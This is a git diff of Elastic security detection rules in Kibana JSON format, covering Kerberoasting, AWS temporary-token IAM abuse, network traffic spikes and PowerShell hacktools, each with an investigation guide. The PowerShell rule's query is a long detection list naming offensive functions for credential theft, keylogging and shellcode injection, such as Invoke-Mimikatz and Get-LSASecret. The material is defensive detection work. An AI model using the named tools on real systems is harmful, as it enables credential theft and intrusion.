"keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c6b40f4c-c6a9-434e-adb8-989b0d06d005", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "Domain: Identity", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.003", + "name": "Pass the Ticket", + "reference": "https://attack.mitre.org/techniques/T1550/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c6b40f4c-c6a9-434e-adb8-989b0d06d005_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1.json b/packages/security_detection_engine/kibana/security_rule/c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1.json deleted file mode 100644 index 0450e178816..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1.json +++ /dev/null @@ -1,93 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects use of sensitive AWS STS or IAM API operations using temporary credentials (session tokens starting with 'ASIA'). This may indicate credential theft or abuse of elevated access via a stolen session. It is not common for legitimate users to perform sensitive IAM operations with temporary session tokens.", - "false_positives": [ - "Some CI/CD pipelines or administrative users may use session tokens. Review user context, IP, and timing to validate." - ], - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM API Calls via Temporary Session Tokens", - "new_terms_fields": [ - "aws.cloudtrail.user_identity.arn" - ], - "note": "## Triage and analysis\n\n### Investigating AWS IAM API Calls via Temporary Session Tokens\n\nThis rule detects sensitive IAM API operations performed using temporary AWS credentials (session tokens starting with 'ASIA'). These are short-lived credentials commonly obtained via sts:GetSessionToken, sts:AssumeRole, or AWS SSO login. While temporary credentials are often used for development and automation, they are rarely associated with direct IAM manipulation and may indicate credential theft, privilege escalation, or abuse of developer access.\n\n#### Possible investigation steps:\n\n- Review aws.cloudtrail.user_identity.arn to determine which IAM user or assumed role initiated the request.\n- Check aws.cloudtrail.user_identity.access_key_id to confirm if the credential starts with 'ASIA', indicating a temporary session token.\n- Examine aws.cloudtrail.user_identity.session_context.mfa_authenticated to verify whether MFA was present during session creation.\n- Investigate source.ip to assess whether the request originated from a known network, office IP, or corporate VPN.\n- Look at user_agent.original to determine if the API call came from a known CLI version or unexpected tool (e.g., unknown SDK, custom script).\n- Confirm whether a recent sts:GetSessionToken, sts:AssumeRole, or AWS SSO login event issued the temporary credential.\n- Correlate other events using the same access key ID to identify additional privileged actions, such as iam:CreateAccessKey, iam:PutUserPolicy, or iam:EnableMFADevice.\n- Analyze timing via @timestamp to determine if the action occurred during off-hours or deviates from normal user behavior.\n- Review the event.outcome to check if the API call was successful or failed, which may indicate unauthorized access attempts.\n- Check for related events in the same session, such as iam:CreateUser, iam:AttachUserPolicy, or sts:GetCallerIdentity, to identify potential lateral movement or privilege escalation.\n\n### False positive analysis:\n\n- Determine if the IAM user or automation pipeline routinely performs privileged actions using temporary session tokens.\n- Validate whether the MFA context and source IP match expected developer or CI/CD behavior.\n- Review recent IAM policy changes or deployments that may explain the behavior.\n- Confirm if the user has a legitimate reason to perform sensitive IAM operations with temporary credentials, such as during a deployment or maintenance window.\n\n### Response and remediation:\n\n- Revoke the temporary session token and rotate long-term access keys for the associated user if the behavior is unauthorized.\n- Audit related CloudTrail events within the same session to identify policy changes, resource creation, or lateral movement.\n- Add explicit deny statements in IAM policies to prevent sensitive IAM actions when aws:authType is not \"console\".\n- Implement IP restrictions for IAM and STS API actions using aws:SourceIp conditions.\n- Strengthen monitoring for IAM activity initiated by session tokens with MFA to improve detection coverage.\n", - "query": "event.dataset: aws.cloudtrail\n and event.provider: (\"iam.amazonaws.com\")\n and aws.cloudtrail.user_identity.type: \"IAMUser\"\n and aws.cloudtrail.user_identity.access_key_id: ASIA*\n", - "references": [ - "https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.40.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.access_key_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "aws.cloudtrail.user_identity.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudTrail", - "Data Source: AWS IAM", - "Data Source: AWS STS", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7db5533-ca2a-41f6-a8b0-ee98abe0f573_109.json b/packages/security_detection_engine/kibana/security_rule/c7db5533-ca2a-41f6-a8b0-ee98abe0f573_109.json new file mode 100644 index 00000000000..28718894bd4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7db5533-ca2a-41f6-a8b0-ee98abe0f573_109.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job detected an unusually large spike in network activity to one destination country in the network logs. This could be due to unusually large amounts of reconnaissance or enumeration traffic. Data exfiltration activity may also produce such a surge in traffic to a destination country that does not normally appear in network traffic or business workflows. Malware instances and persistence mechanisms may communicate with command-and-control (C2) infrastructure in their country of origin, which may be an unusual destination country for the source network.", + "false_positives": [ + "Business workflows that occur very occasionally, and involve an unusual surge in network traffic to one destination country, can trigger this alert. A new business workflow or a surge in business activity in a particular country may trigger this alert. Business travelers who roam to many countries for brief periods may trigger this alert if they engage in volumetric network activity." + ], + "from": "now-30m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "high_count_by_destination_country", + "name": "Spike in Network Traffic To a Country", + "note": "## Triage and analysis\n\n### Investigating Spike in Network Traffic To a Country\n\nMonitoring network traffic for anomalies is a good methodology for uncovering various potentially suspicious activities. For example, data exfiltration or infected machines may communicate with a command-and-control (C2) server in another country your company doesn't have business with.\n\nThis rule uses a machine learning job to detect a significant spike in the network traffic to a country, which can indicate reconnaissance or enumeration activities, an infected machine being used as a bot in a DDoS attack, or potentially data exfiltration.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as role, criticality, and associated users.\n- Investigate other alerts associated with the involved assets during the past 48 hours.\n- Examine the data available and determine the exact users and processes involved in those connections.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Consider the time of day. If the user is a human (not a program or script), did the activity occurs during working hours?\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n\n### False positive analysis\n\n- Understand the context of the connections by contacting the asset owners. If this activity is related to a new business process or newly implemented (approved) technology, consider adding exceptions \u2014 preferably with a combination of user and source conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n - Remove and block malicious artifacts identified during triage.\n- Consider implementing temporary network border rules to block or alert connections to the target country, if relevant.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "network_traffic", + "version": "^1.33.0" + } + ], + "risk_score": 21, + "rule_id": "c7db5533-ca2a-41f6-a8b0-ee98abe0f573", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Network Packet Capture\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Network Packet Capture Integration Setup\nThe Network Packet Capture integration sniffs network packets on a host and dissects known protocols. Monitoring the network traffic is critical to gaining observability and securing your environment \u2014 ensuring high levels of performance and security. The Network Packet Capture integration captures the network traffic between your application servers, decodes common application layer protocols and records the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"network_traffic\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cNetwork Packet Capture\u201d and select the integration to see more details about it.\n- Click \u201cAdd Network Packet Capture\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cnetwork_traffic\u201d to an existing or a new agent policy, and deploy the agent on your system from which network log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/network_traffic).\n", + "severity": "low", + "tags": [ + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/" + } + ] + } + ], + "type": "machine_learning", + "version": 109 + }, + "id": "c7db5533-ca2a-41f6-a8b0-ee98abe0f573_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_210.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_210.json index b05df6ebfb8..76d16aefac2 100644 --- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_210.json +++ b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_210.json b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_210.json index fce18181894..19c273b4d26 100644 --- a/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_210.json +++ b/packages/security_detection_engine/kibana/security_rule/cad4500a-abd7-4ef3-b5d3-95524de7cfe1_210.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_109.json index 98b56f1dea0..3ec1b88de40 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/cc6a8a20-2df2-11ed-8378-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_219.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_219.json new file mode 100644 index 00000000000..f69d9e00c04 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_219.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell HackTool Script by Function Names", + "note": "## Triage and analysis\n\n### Investigating Potential PowerShell HackTool Script by Function Names\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries often exploit PowerShell's capabilities to execute malicious scripts and perform various attacks. This rule identifies known offensive tooling function names in PowerShell scripts, as attackers commonly use out-of-the-box tools without modifying the code. By monitoring these specific function names, the rule aims to detect and alert potential malicious PowerShell activity.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the script's execution context, such as the user account, privileges, the role of the system on which it was executed, and any relevant timestamps.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate the origin of the PowerShell script, including its source, download method, and any associated URLs or IP addresses.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This rule may generate false positives if legitimate scripts or tools used by administrators contain any of the listed function names. These function names are commonly associated with offensive tooling, but they may also be present in benign scripts or tools.\n- To handle these false positives consider adding exceptions - preferably with a combination of full file path and users.\n\n### Related Rules\n\n- PowerShell Invoke-NinjaCopy script - b8386923-b02c-4b94-986a-d223d9b01f88\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Add-DomainGroupMember\" or \"Add-DomainObjectAcl\" or\n \"Add-RemoteConnection\" or \"Add-ServiceDacl\" or\n \"Add-Win32Type\" or \"Convert-ADName\" or\n \"Convert-LDAPProperty\" or \"ConvertFrom-LDAPLogonHours\" or\n \"ConvertFrom-UACValue\" or \"Copy-ArrayOfMemAddresses\" or\n \"Create-NamedPipe\" or \"Create-ProcessWithToken\" or\n \"Create-RemoteThread\" or \"Create-SuspendedWinLogon\" or\n \"Create-WinLogonProcess\" or \"Emit-CallThreadStub\" or\n \"Enable-SeAssignPrimaryTokenPrivilege\" or \"Enable-SeDebugPrivilege\" or\n \"Enum-AllTokens\" or \"Export-PowerViewCSV\" or\n \"Find-AVSignature\" or \"Find-AppLockerLog\" or\n \"Find-DomainLocalGroupMember\" or \"Find-DomainObjectPropertyOutlier\" or\n \"Find-DomainProcess\" or \"Find-DomainShare\" or\n \"Find-DomainUserEvent\" or \"Find-DomainUserLocation\" or\n \"Find-InterestingDomainAcl\" or \"Find-InterestingDomainShareFile\" or\n \"Find-InterestingFile\" or \"Find-LocalAdminAccess\" or\n \"Find-PSScriptsInPSAppLog\" or \"Find-PathDLLHijack\" or\n \"Find-ProcessDLLHijack\" or \"Find-RDPClientConnection\" or\n \"Get-AllAttributesForClass\" or \"Get-CachedGPPPassword\" or\n \"Get-DecryptedCpassword\" or \"Get-DecryptedSitelistPassword\" or\n \"Get-DelegateType\" or \"New-RelayEnumObject\" or\n \"Get-DomainDFSShare\" or \"Get-DomainDFSShareV1\" or\n \"Get-DomainDFSShareV2\" or \"Get-DomainDNSRecord\" or\n \"Get-DomainDNSZone\" or \"Get-DomainFileServer\" or\n \"Get-DomainForeignGroupMember\" or \"Get-DomainForeignUser\" or\n \"Get-DomainGPO\" or \"Get-DomainGPOComputerLocalGroupMapping\" or\n \"Get-DomainGPOLocalGroup\" or \"Get-DomainGPOUserLocalGroupMapping\" or\n \"Get-DomainGUIDMap\" or \"Get-DomainGroup\" or\n \"Get-DomainGroupMember\" or \"Get-DomainGroupMemberDeleted\" or\n \"Get-DomainManagedSecurityGroup\" or \"Get-DomainOU\" or\n \"Get-DomainObject\" or \"Get-DomainObjectAcl\" or\n \"Get-DomainObjectAttributeHistory\" or \"Get-DomainObjectLinkedAttributeHistory\" or\n \"Get-DomainPolicyData\" or \"Get-DomainSID\" or\n \"Get-DomainSPNTicket\" or \"Get-DomainSearcher\" or\n \"Get-DomainSite\" or \"Get-DomainSubnet\" or\n \"Get-DomainTrust\" or \"Get-DomainTrustMapping\" or\n \"Get-DomainUser\" or \"Get-DomainUserEvent\" or\n \"Get-Forest\" or \"Get-ForestDomain\" or\n \"Get-ForestGlobalCatalog\" or \"Get-ForestSchemaClass\" or\n \"Get-ForestTrust\" or \"Get-GPODelegation\" or\n \"Get-GPPAutologon\" or \"Get-GPPInnerField\" or\n \"Get-GPPInnerFields\" or \"Get-GPPPassword\" or\n \"Get-GptTmpl\" or \"Get-GroupsXML\" or\n \"Get-HttpStatus\" or \"Get-ImageNtHeaders\" or\n \"Get-Keystrokes\" or \"New-SOASerialNumberArray\" or\n \"Get-MemoryProcAddress\" or \"Get-MicrophoneAudio\" or\n \"Get-ModifiablePath\" or \"Get-ModifiableRegistryAutoRun\" or\n \"Get-ModifiableScheduledTaskFile\" or \"Get-ModifiableService\" or\n \"Get-ModifiableServiceFile\" or \"Get-Name\" or\n \"Get-NetComputerSiteName\" or \"Get-NetLocalGroup\" or\n \"Get-NetLocalGroupMember\" or \"Get-NetLoggedon\" or\n \"Get-NetRDPSession\" or \"Get-NetSession\" or\n \"Get-NetShare\" or \"Get-PEArchitecture\" or\n \"Get-PEBasicInfo\" or \"Get-PEDetailedInfo\" or\n \"Get-PathAcl\" or \"Get-PrimaryToken\" or\n \"Get-ProcAddress\" or \"Get-ProcessTokenGroup\" or\n \"Get-ProcessTokenPrivilege\" or \"Get-ProcessTokenType\" or\n \"Get-RegLoggedOn\" or \"Get-RegistryAlwaysInstallElevated\" or\n \"Get-RegistryAutoLogon\" or \"Get-RemoteProcAddress\" or\n \"Get-Screenshot\" or \"Get-ServiceDetail\" or\n \"Get-SiteListPassword\" or \"Get-SitelistField\" or\n \"Get-System\" or \"Get-SystemNamedPipe\" or\n \"Get-SystemToken\" or \"Get-ThreadToken\" or\n \"Get-TimedScreenshot\" or \"Get-TokenInformation\" or\n \"Get-TopPort\" or \"Get-UnattendedInstallFile\" or\n \"Get-UniqueTokens\" or \"Get-UnquotedService\" or\n \"Get-VaultCredential\" or \"Get-VaultElementValue\" or\n \"Get-VirtualProtectValue\" or \"Get-VolumeShadowCopy\" or\n \"Get-WMIProcess\" or \"Get-WMIRegCachedRDPConnection\" or\n \"Get-WMIRegLastLoggedOn\" or \"Get-WMIRegMountedDrive\" or\n \"Get-WMIRegProxy\" or \"Get-WebConfig\" or\n \"Get-Win32Constants\" or \"Get-Win32Functions\" or\n \"Get-Win32Types\" or \"Import-DllImports\" or\n \"Import-DllInRemoteProcess\" or \"Inject-LocalShellcode\" or\n \"Inject-RemoteShellcode\" or \"Install-ServiceBinary\" or\n \"Invoke-CompareAttributesForClass\" or \"Invoke-CreateRemoteThread\" or\n \"Invoke-CredentialInjection\" or \"Invoke-DllInjection\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-ImpersonateUser\" or\n \"Invoke-Kerberoast\" or \"Invoke-MemoryFreeLibrary\" or\n \"Invoke-MemoryLoadLibrary\" or\n \"Invoke-Mimikatz\" or \"Invoke-NinjaCopy\" or\n \"Invoke-PatchDll\" or \"Invoke-Portscan\" or\n \"Invoke-PrivescAudit\" or \"Invoke-ReflectivePEInjection\" or\n \"Invoke-ReverseDnsLookup\" or \"Invoke-RevertToSelf\" or\n \"Invoke-ServiceAbuse\" or \"Invoke-Shellcode\" or\n \"Invoke-TokenManipulation\" or \"Invoke-UserImpersonation\" or\n \"Invoke-WmiCommand\" or \"Mount-VolumeShadowCopy\" or\n \"New-ADObjectAccessControlEntry\" or \"New-DomainGroup\" or\n \"New-DomainUser\" or \"New-DynamicParameter\" or\n \"New-InMemoryModule\" or\n \"New-ThreadedFunction\" or \"New-VolumeShadowCopy\" or\n \"Out-CompressedDll\" or \"Out-EncodedCommand\" or\n \"Out-EncryptedScript\" or \"Out-Minidump\" or\n \"PortScan-Alive\" or \"Portscan-Port\" or\n \"Remove-DomainGroupMember\" or \"Remove-DomainObjectAcl\" or\n \"Remove-RemoteConnection\" or \"Remove-VolumeShadowCopy\" or\n \"Restore-ServiceBinary\" or \"Set-DesktopACLToAllowEveryone\" or\n \"Set-DesktopACLs\" or \"Set-DomainObject\" or\n \"Set-DomainObjectOwner\" or \"Set-DomainUserPassword\" or\n \"Set-ServiceBinaryPath\" or \"Sub-SignedIntAsUnsigned\" or\n \"Test-AdminAccess\" or \"Test-MemoryRangeValid\" or\n \"Test-ServiceDaclPermission\" or \"Update-ExeFunctions\" or\n \"Update-MemoryAddresses\" or \"Update-MemoryProtectionFlags\" or\n \"Write-BytesToMemory\" or \"Write-HijackDll\" or\n \"Write-PortscanOut\" or \"Write-ServiceBinary\" or\n \"Write-UserAddMSI\" or \"Invoke-Privesc\" or\n \"func_get_proc_address\" or \"Invoke-BloodHound\" or\n \"Invoke-HostEnum\" or \"Get-BrowserInformation\" or\n \"Get-DomainAccountPolicy\" or \"Get-DomainAdmins\" or\n \"Get-AVProcesses\" or \"Get-AVInfo\" or\n \"Get-RecycleBin\" or \"Invoke-BruteForce\" or\n \"Get-PassHints\" or \"Invoke-SessionGopher\" or\n \"Get-LSASecret\" or \"Get-PassHashes\" or\n \"Invoke-WdigestDowngrade\" or \"Get-ChromeDump\" or\n 